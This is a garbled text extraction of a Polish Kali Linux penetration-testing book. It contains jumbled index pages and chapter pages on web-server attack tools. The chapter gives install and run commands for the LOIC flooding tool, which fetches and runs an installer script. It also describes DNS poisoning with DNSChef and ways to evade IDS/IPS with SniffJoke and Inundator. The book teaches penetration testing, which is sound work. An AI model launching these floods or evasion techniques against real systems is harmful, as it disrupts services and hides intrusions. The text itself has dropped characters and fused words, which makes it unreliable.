w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
